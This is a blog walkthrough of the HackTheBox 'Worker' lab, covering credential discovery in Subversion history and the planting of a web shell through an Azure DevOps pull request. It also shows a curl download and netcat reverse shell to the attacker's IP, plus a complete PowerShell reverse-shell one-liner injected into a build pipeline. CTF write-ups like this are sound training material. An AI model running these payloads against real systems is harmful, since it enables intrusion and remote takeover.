Open in app

Sign in

Write

Sign in

Worker — HackTheBox

Abass Sesay
6 min readJan 30, 2021

--

Worker

TL;DR

This box takes you through some of the repercussions of having an attacker gain a foothold in your organization and the how they would compromise you development infrastructure to pivot or gain persistence.

Foothold Reconnaissance

For the initial recon you will have to start with NMAP

PORT     STATE SERVICE  VERSION
80/tcp   open  http     Microsoft IIS httpd 10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
3690/tcp open  svnserve Subversion
5985/tcp open  http     Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

This gives a couple of things to explore. The website at port 80 is just the default IIS webpage. Next up is the svnserve endpoint. Running on this endpoint is a Subversion Version Control System (like Git). Next step is to pull the repository from this endpoint to see where it leads.

svn checkout svn://worker.htb

The change logs will reveal credentials that will lead to the next pivot.

kali@kali:~/HTB/Worker$ svn log
--------------------------------------------------------------------
r5 | nathen | 2020-06-20 09:52:00 -0400 (Sat, 20 Jun 2020) | 1 lineAdded note that repo has been migrated
--------------------------------------------------------------------
r4 | nathen | 2020-06-20 09:50:20 -0400 (Sat, 20 Jun 2020) | 1 lineMoving this repo to our new devops server which will handle the deployment for us
--------------------------------------------------------------------
r3 | nathen | 2020-06-20 09:46:19 -0400 (Sat, 20 Jun 2020) | 1 line-
--------------------------------------------------------------------
r2 | nathen | 2020-06-20 09:45:16 -0400 (Sat, 20 Jun 2020) | 1 lineAdded deployment script
--------------------------------------------------------------------
r1 | nathen | 2020-06-20 09:43:43 -0400 (Sat, 20 Jun 2020) | 1 lineFirst version
--------------------------------------------------------------------kali@kali:~/HTB/Worker$ svn diff -r 1:2
Index: deploy.ps1
===================================================================
--- deploy.ps1  (nonexistent)
+++ deploy.ps1  (revision 2)
@@ -0,0 +1,6 @@
+$user = "nathen" 
+$plain = "wendel98"
+$pwd = ($plain | ConvertTo-SecureString)
+$Credential = New-Object System.Management.Automation.PSCredential $user, $pwd
+$args = "Copy-Site.ps1"
+Start-Process powershell.exe -Credential $Credential -ArgumentList ("-file $args")kali@kali:~/HTB/Worker$ svn diff -r 4:5
Index: moved.txt
===================================================================
--- moved.txt   (nonexistent)
+++ moved.txt   (revision 5)
@@ -0,0 +1,5 @@
+This repository has been migrated and will no longer be maintaned here.
+You can find the latest version at: http://devops.worker.htb
+
+// The Worker team :)
+

The result reveal a subdomain of interest devops.worker.htb and credentials. This subdomain is a locally deployed Azure Devops Portal. The credentials can be used to login as “nathen”.

There are multiple repos in this portal under the “SmartHotel360” project.

If you poke around you will land on the build pipeline from where you can see that each project is deployed to a subdomain that corresponds to the repository name.

For example “alpha.worker.htb”. When you access this page, the response headers reveal that this is a ASP.NET project.

Foothold

Since you now have access to the repo, the goal is to drop a shell in the repo and have it built and deployed. If you are on Kali, there is already a copy of such shell in “/usr/share/seclists/Web-Shells/FuzzDB/cmd.aspx” .

You can create this file from the UI.

Create a PR and then merge to the main branch. When creating a PR a workitem has to be attached. If you start typing a suggestion will come up that you can select.

You can self approve the PR and then complete it. This will trigger a build and deployment when completed.

Once deployed you can navigate to the “/cmd.aspx” (the name of the reverse shell file created).

Through this shell you can initiate commands to get netcat on the box and the start a reverse shell.

cd \Windows\Temp\ && curl -O http://10.10.14.26:8000/nc64.exe
\Windows\Temp\nc64.exe 10.10.14.26 1337 -e cmd.exe

This box was running a script that resets the repository to initial state every 10 minutes. You will have to be quick. This will not happen in real life but in this case I am guessing it was done so that someone else will not stumble on your shell file.

User Reconnaissance

Once on the box you will realized that you cannot really do much you are the user “defaultapppool”.

kali@kali:~/HTB/Worker$ listen 1337
listening on [any] 1337 ...
connect to [10.10.14.26] from (UNKNOWN) [10.10.10.203] 59604
Microsoft Windows [Version 10.0.17763.1282]
(c) 2018 Microsoft Corporation. All rights reserved.c:\windows\system32\inetsrv>cd C:\Users
cd C:\UsersC:\Users>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 32D6-9041Directory of C:\Users2020-07-07  16:53    <DIR>          .
2020-07-07  16:53    <DIR>          ..
2020-03-28  14:59    <DIR>          .NET v4.5
2020-03-28  14:59    <DIR>          .NET v4.5 Classic
2020-08-17  23:33    <DIR>          Administrator
2020-03-28  14:01    <DIR>          Public
2020-07-22  00:11    <DIR>          restorer
2020-07-08  18:22    <DIR>          robisl
               0 File(s)              0 bytes
               8 Dir(s)  10�303�868�928 bytes freeC:\Users>cd robisl
cd robisl
Access is denied.C:\Users>whoami
whoami
iis apppool\defaultapppool

You will need credentials for the user “robisl”. Digging around you will discover the file `W:\svnrepos\www\conf\passwd`

type W:\svnrepos\www\conf\passwd
### This file is an example password file for svnserve.
### Its format is similar to that of svnserve.conf. As shown in the
### example below it contains one section labelled [users].
### The name and password for each user follow, one account per line.[users]
...
robisl = wolves11
...

User Flag

With these credential you can leverage Evil-WinRM to connect as this “robisl” and grab the user file

kali@kali:~/HTB/Tools$ evil-winrm -i 10.10.10.203 -u robisl -p wolves11Evil-WinRM shell v2.3Info: Establishing connection to remote endpoint*Evil-WinRM* PS C:\Users\robisl\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\robisl\Desktop> dirDirectory: C:\Users\robisl\DesktopMode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        12/6/2020   4:21 AM             34 user.txt*Evil-WinRM* PS C:\Users\robisl\Desktop>

Root Reconnaissance

Since we have credentials for the user “robisl” you will need to explore what are some of the things he can do in the Azure DevOps portal.

This user can create a pipeline. You can include powershell code when constructing a pipeline. This is the what will be leveraged to get the root flag.

Root Flag

To Create a pipeline, go to the pipeline blade and click on “New pipeline”. Then select “Azure Repos Git” followed by the actual repository. The next step is to select a project type that fit the pipeline that you are creating; it does not really matter what you select here as we will change in the next step. When presented with the yaml in the final step, replace the “steps” with the following that will trigger a powershell.

- task: PowerShell@2
  timeoutInMinutes: 10
  inputs:
    targetType: 'inline'
    script: "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.26',4443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Save and run.

When the power shell task is executed, a reverse shell will be initiated.

The shell I got was not very stable and hence I had a limited time to go in and get the flag.

kali@kali:~/HTB/Worker$ listen 4443
listening on [any] 4443 ...
connect to [10.10.14.26] from (UNKNOWN) [10.10.10.203] 51469PS W:\agents\agent11\_work\14\s> cd C:
PS C:\> cd Users\Administrator
PS C:\Users\Administrator> cd Desktop
PS C:\Users\Administrator\Desktop> lsDirectory: C:\Users\Administrator\DesktopMode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-ar---       2020-12-07     18:06             34 root.txt
Htb
Hackthebox Writeup
Windows
Penetration Testing

--

--

Abass Sesay

Written by Abass Sesay

7 Followers

Aspiring Cybersecurity professional currently working as a Software Engineer. Hail from Sierra Leone currently living in the Pacific North West.

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams